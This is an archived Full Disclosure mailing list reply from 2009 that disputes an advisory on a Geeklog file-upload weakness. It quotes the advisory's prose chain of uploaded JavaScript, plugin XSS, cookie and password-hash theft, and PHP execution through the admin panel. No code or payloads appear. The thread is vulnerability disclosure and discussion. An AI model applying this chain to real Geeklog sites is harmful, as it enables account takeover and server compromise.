Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Geeklog <= v1.6.0sr2 - Remote File Upload

From: darky <mlistdarky () gmail com>
Date: Sat, 03 Oct 2009 14:48:06 +0200

Files with .jpg extensions can be uploaded, but these file can contain
anything, like javascript or PHP code. Using FireFox you can upload any
jpg extension and it will be accepted since FireFox sets the mime type
based on file extension.

Uploading usually requires that you first create a user account.  Once an
account is created, you can upload a user photo, which could take advantage
of this vulnerability.
  

Ok so this is not a remote file upload issue if you can only upload allowed files (not
files with bad exts), this is just a feature that doesn't valid the mime type. This can
help for another exploitation but you can't execute code directly at this point.


Potential Abuse
===============
Executable javascript can easily be uploaded. There are several XSS holes in
many of the Geeklog plugins which could run the uploaded javascript. If a simple
cookie stealing javascript were uploaded, it could be used to expose the Geeklog
uid and password hash which is as good as having the actual password.
  

So you just upload a JS file in order to help you with the XSS ?


If you
expose an administrative account, you have full access to the admin panel
where you can set the staticpages.PHP permission to true, then create a
static page that will run any PHP script you desire, potentially exposing
the entire server.
  

Ok so here you have a remote code execution in the admin panel.


Successful exploitation requires the ability to execute the uploaded JavaScript.
The Geeklog Forum program can be used as an attack vector since it does not
properly validate many $_GET / $_POST variables.

Could you give us some more details about these XSS vulnerabilities ? :)

Cause all I see here is a RCE in the admin panel.
You confirm that there are XSS but we don't have any details about them...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: